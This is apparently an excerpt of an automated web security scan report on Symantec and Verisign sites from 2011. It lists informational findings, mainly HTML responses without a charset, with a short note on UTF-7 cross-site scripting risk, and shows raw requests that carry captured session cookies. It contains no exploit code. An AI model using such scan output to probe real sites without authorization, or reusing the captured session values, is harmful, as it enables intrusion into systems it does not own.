21.61. https://www-secure.symantec.com/about/profile/policies/legal.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/about/profile/policies/legal.jsp

Request

GET /about/profile/policies/legal.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1694
Date: Fri, 09 Sep 2011 21:47:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59713

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Legal Notices</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="Conten
...[SNIP]...

21.62. https://www-secure.symantec.com/about/profile/policies/privacy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/about/profile/policies/privacy.jsp

Request

GET /about/profile/policies/privacy.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.63. https://www-secure.symantec.com/business/theme.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/business/theme.jsp

Request

GET /business/theme.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1688
Date: Fri, 09 Sep 2011 21:47:38 GMT
Content-Length: 0
Connection: close

21.64. https://www-secure.symantec.com/feedback/contactus.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/feedback/contactus.jsp

Request

GET /feedback/contactus.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1684
Date: Fri, 09 Sep 2011 21:47:32 GMT
Content-Length: 29862
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Contact Us - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http
...[SNIP]...

21.65. https://www-secure.symantec.com/feedback/webmaster.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/feedback/webmaster.jsp

Request

GET /feedback/webmaster.jsp?theURL= HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1677
Date: Fri, 09 Sep 2011 21:47:32 GMT
Content-Length: 24273
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Report a Broken Link - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>

...[SNIP]...

21.66. https://www-secure.symantec.com/globalsites/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/globalsites/index.jsp

Request

GET /globalsites/index.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1722
Date: Fri, 09 Sep 2011 21:47:39 GMT
Content-Length: 23505
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Global Sites - Symantec Corp.</title>
<meta http-equiv="Content-Type" conten
...[SNIP]...

21.67. https://www-secure.symantec.com/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/index.jsp

Request

GET /index.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1720
Date: Fri, 09 Sep 2011 21:47:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42824

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Symantec - AntiVirus, Anti-Spyware, Endpoint Security, Backup, Storage Solut
...[SNIP]...

21.68. https://www-secure.symantec.com/rss/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/rss/index.jsp

Request

GET /rss/index.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1694
Date: Fri, 09 Sep 2011 21:47:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>RSS - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv=
...[SNIP]...

21.69. https://www-secure.symantec.com/sitemap/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/sitemap/index.jsp

Request

GET /sitemap/index.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1616
Date: Fri, 09 Sep 2011 21:47:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33953

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Site Map: Information Security - Computer Security Solutions and Services | Symantec Corp</title>
<meta http-equiv=
...[SNIP]...

21.70. https://www.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/

Request

Response

21.71. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/authweb/global/assets/shared/js/rotator.custom.js

Request

GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
Referer: https://www.verisign.com/products-services/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:27:48 GMT
Content-Length: 985
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

$(document).ready (function(){
   bannerFadeIn = 0;
   bannerFadeOut = 0;
   $("#prevnext a.prev").click(function(e){
       var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) +
...[SNIP]...

21.72. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/authweb/global/assets/shared/js/rotator.js

Request

GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
Referer: https://www.verisign.com/products-services/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:27:48 GMT
Content-Length: 4102
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

var activeBannerId = "";
var activeBannerControllerId = "";
var activeTipId = "";
var rotate = true;
var myBannerNumber = 1;
var activeBannerNumber = myBannerNumber;
var bannerItemsLength = $(
...[SNIP]...

21.73. https://www.verisign.com/products-services/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/products-services/index.html

Request

Response

22. HTML does not specify charset previous next
There are 63 instances of this issue:

http://cdn.verisign.com/assets/fonts/samd____-webfont.woff
http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js
https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js
https://cdn.verisign.com/authweb/global/assets/header/js/header.js
https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
https://cdn.verisign.com/authweb/global/assets/home/js/home.js
https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js
https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js
https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
https://cert.webtrust.org/ViewSeal
https://enterprise-ssl-admin.verisign.com/
https://fileconnect.symantec.com/
https://fileconnect.symantec.com/favicon.ico
https://fileconnect.symantec.com/javascript/common.js
https://knowledge.verisign.ch/support/ssl-certificates-support/index
https://knowledge.verisign.com/support/code-signing-support/index
https://knowledge.verisign.com/support/mpki-for-ssl-support/index
https://knowledge.verisign.com/support/ssl-certificates-support/index
http://partnerlocator.symantec.com/
http://partnerlocator.symantec.com/public/product_finder
http://partnerlocator.symantec.com/public/pulldown_list
http://partnerlocator.symantec.com/public/search
https://partnernet.symantec.com/
http://player.ooyala.com/info/primary/
https://policy3.responsys.net/
https://renewals.symantec.com/renewals/chat_norton.jsp
https://securitycenter.verisign.com/
https://securitycenter.verisign.com/celp/enroll/orderStatus
https://securitycenter.verisign.com/celp/enroll/outsideSearch
https://securitycenter.verisign.com/celp/enroll/retail
https://securitycenter.verisign.com/celp/enroll/upsell
https://trust-center.verisign.com/rcm/TeaLeafTarget.html
http://www.verisign.ch/
http://www.verisign.ch/assets/global/js/leftnav.js
http://www.verisign.ch/assets/shared/js/jquery.url.packed.js
http://www.verisign.ch/assets/shared/js/leftnav_new.js
http://www.verisign.ch/corporate/index.html
http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js
http://www.verisign.com/
http://www.verisign.com/authweb/global/assets/header/js/flyouts.js
http://www.verisign.com/authweb/global/assets/header/js/header.js
http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico
http://www.verisign.com/authweb/global/assets/shared/js/globals.js
http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js
http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://www.verisign.com/authweb/global/assets/shared/js/jquery.js
http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
http://www.verisign.com/authweb/global/assets/shared/js/rotator.js
https://www.verisign.com/
https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
https://www.verisign.com/authweb/global/assets/shared/js/rotator.js

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

22.1. http://cdn.verisign.com/assets/fonts/samd____-webfont.woff previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.verisign.com
Path:	/assets/fonts/samd____-webfont.woff

Request

GET /assets/fonts/samd____-webfont.woff HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "2ef819b-7544-4a59eedb01b80"
Accept-Ranges: bytes
Content-Type: text/html
Age: 3152
Date: Fri, 09 Sep 2011 21:27:10 GMT
Last-Modified: Mon, 13 Jun 2011 21:51:58 GMT
Expires: Sun, 09 Oct 2011 13:52:54 GMT
Content-Length: 30020
Connection: keep-alive

wOFF......uD................................FFTM............\...GDEF........... ....GPOS..........7&[0{.GSUB.......,...0....OS/2.......R...`x..fcmap...D...r....y0..cvt .......2...2
o..fpgm...........e
...[SNIP]...

22.2. http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.verisign.com
Path:	/authweb/en_ch/assets/shared/js/google-analytics.js

Request

GET /authweb/en_ch/assets/shared/js/google-analytics.js HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Content-Type: text/html
Vary: Accept-Encoding
Age: 27500
Date: Fri, 09 Sep 2011 21:25:03 GMT
Expires: Sun, 09 Oct 2011 13:46:43 GMT
Content-Length: 460
Connection: keep-alive

var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-295855-1']);
   _gaq.push(['_setDomainName', '.verisign.ch']);
   _gaq.push(['_trackPageview']);

(function() {
   var ga = document.createElement('scri
...[SNIP]...

22.3. http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.cacheimage.js

Request

GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Content-Type: text/html
Vary: Accept-Encoding
Age: 73854
Date: Fri, 09 Sep 2011 21:25:44 GMT
Expires: Sun, 09 Oct 2011 18:24:34 GMT
Content-Length: 1356
Connection: keep-alive

/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plugin can be used to eliminate flashes of unstyled content (FOUC) and
* improve perceived
...[SNIP]...

22.4. http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/shared.js

Request

GET /authweb/global/assets/shared/js/shared.js HTTP/1.1
Host: cdn.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Content-Type: text/html
Vary: Accept-Encoding
Age: 69510
Date: Fri, 09 Sep 2011 21:24:45 GMT
Expires: Sun, 09 Oct 2011 05:58:30 GMT
Content-Length: 37327
Connection: keep-alive

// FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plug
...[SNIP]...

22.5. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/en_us/assets/shared/js/google-analytics.js

Request

Response

22.6. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/header/js/flyouts.js

Request

GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.7. https://cdn.verisign.com/authweb/global/assets/header/js/header.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/header/js/header.js

Request

GET /authweb/global/assets/header/js/header.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 13
Expires: Sun, 09 Oct 2011 21:38:30 GMT
Content-Length: 1558

/*******************************************
** Header functions **
*******************************************/
//----------------------------------------//
//Load Defaults when DOM i
...[SNIP]...

22.8. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/header/js/jquery.autocomplete.js

Request

Response

22.9. https://cdn.verisign.com/authweb/global/assets/home/js/home.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/home/js/home.js

Request

GET /authweb/global/assets/home/js/home.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.10. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/global-preload.js

Request

GET /authweb/global/assets/shared/js/global-preload.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Age: 69230
Expires: Sun, 09 Oct 2011 02:24:38 GMT
Content-Length: 135518

// FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.js
/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the M
...[SNIP]...

22.11. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/google-analytics.js

Request

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:28 GMT
Content-Length: 471

var _gaq = _gaq || [];
   _gaq.push(['_setAccount', 'UA-295855-1']);
   _gaq.push(['_setDomainName', '.verisign.com']);
   _gaq.push(['_trackPageview']);

(function() {
   var ga = document.createElemen
...[SNIP]...

22.12. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.boxshadow.js

Request

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:27 GMT
Content-Length: 1538

/* **
* jquery-boxshadow.js
*
* $(object).boxshadow({
* hOffset : 3,
* vOffset : 3,
* shadowblur : 3,
* color : '#808080'
* })
*
* If you are using this with IE, you should s
...[SNIP]...

22.13. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.cacheimage.js

Request

Response

22.14. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.hover_intent.js

Request

Response

22.15. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/oo-engine.js

Request

GET /authweb/global/assets/shared/js/oo-engine.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Fri, 09 Sep 2011 21:38:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:38:28 GMT
Content-Length: 1154

/* OnlineOpinion (S3tS v3.1) */

/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */

var custom_var,
...[SNIP]...

22.16. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/rotator.js

Request

GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.17. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdn.verisign.com
Path:	/authweb/global/assets/shared/js/shared.js

Request

GET /authweb/global/assets/shared/js/shared.js HTTP/1.1
Host: cdn.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.18. https://cert.webtrust.org/ViewSeal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cert.webtrust.org
Path:	/ViewSeal

Request

GET /ViewSeal HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

22.19. https://enterprise-ssl-admin.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprise-ssl-admin.verisign.com
Path:	/

Request

GET / HTTP/1.1
Host: enterprise-ssl-admin.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

